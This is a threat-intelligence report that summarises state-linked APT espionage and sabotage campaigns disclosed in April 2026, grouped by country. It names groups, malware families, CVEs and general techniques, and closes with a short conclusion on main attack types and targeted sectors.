April 2026 Threat Trend Report on APT Groups
Purpose and Scope
this report covers cyber espionage and covert sabotage activities by Region-led threat groups believed to be supported by the Region. it excludes cybercrime groups that operate for financial gain. based on publicly available analysis over the past month, we categorized threat actors according to the names of their representatives in the ATIP.
Leading APT groups by Region
North Korea.
north Korea-linked groups have focused on developers and the cryptocurrency space. UNC1069 conducted supply chain attacks by tampering with the Axios NPM package and injecting malicious dependencies, while Lazarus used a combination of fake interviews, GitHub projects, AI content, and ClickFix (a technique that prompts users to execute commands directly) to expand its reach to macOS, Web3, and cryptocurrency environments.
Famous Chollima.
Famous Chollima (Contagious Interview) published malicious packages to five open source ecosystems, including npm, PyPI, Go Modules, crates.io, and Packagist, to deliver a staged RAT payload. credentials, browser data, password manager information, and cryptocurrency wallet data were stolen.
VoidDokkaebi.
VoidDokkaebi infected developers with fake job interviews and turned code repositories into supply chain infection channels. DEV#POPPER RAT, InvisibleFerret, OtterCookie, OmniStealer, BeaverTail, and others were mentioned.
China.
china-linked groups have been targeting cloud and network infrastructure. Mustang Panda targeted European and Middle Eastern governments and diplomatic organizations, conducting web bug reconnaissance, OAuth redirect exploits, fake Cloudflare Turnstile pages, and PlugX distribution. Silver Fox targeted Japanese users with Rakuten bill baiting and DLL side-loading using Dell/Waves MaxxAudio good-signed executables to execute ValleyRAT.
Russia.
APT28 compromised vulnerable SOHO routers and network equipment to tamper with DNS settings and bypass traffic to the attack infrastructure. at the same time, it leveraged a zero-click vulnerability (CVE-2026-32202) in a Windows LNK file-based attack chain to steal NTLM credentials. Sandworm (APT-C-13) infiltrated through a ZIP file containing a malicious LNK and mapped SMB, RDP, and SSH services to the Onion domain using Tor and SSH nested tunnels.
Iran.
Charming Kitten (APT35) exploited an Exchange Server proxy login vulnerability (CVE-2021-26855) to operate a multi-layered infrastructure, while OilRig APT-C-49 used a stealthy C2 scheme that combined Excel macros with GitHub, Google Drive, and Telegram bots. Bitter used Android spyware, including ProSpy, to target civil society and government-related targets in the Middle East.
Pakistan.
Transparent Tribe (APT36) used Operation TrustTrap, a large-scale domain spoofing campaign, to mimic government portals for credential and payment card theft; it also operated DeskRAT and WebSocket C2, which exploited .Desktop files in Linux environments.
Others.
Harvester was a GoGra Linux backdoor that exploited Microsoft Graph APIs and Outlook mailboxes as covert C2 channels. TGR-STA-1030 conducted a global espionage campaign that combined phishing, public vulnerabilities, Cobalt Strike, VShell, and ShadowGuard eBPF rootkits. UAT-4356 exploited CVE-2025-20333 and CVE-2025-20362 to deploy a FIRESTARTER backdoor on Cisco Firepower FXOS devices.
Conclusion
in April 2026, a total of 15 APT groups were disclosed. the main attacks are summarized as email and social engineering, supply chain attacks, router and network device takeover, zero-click and vulnerability exploitation. the security, energy, diplomacy, politics, high-tech industry, and aerospace sectors are the main targets, so it is necessary to have a phased response system and internal visibility.
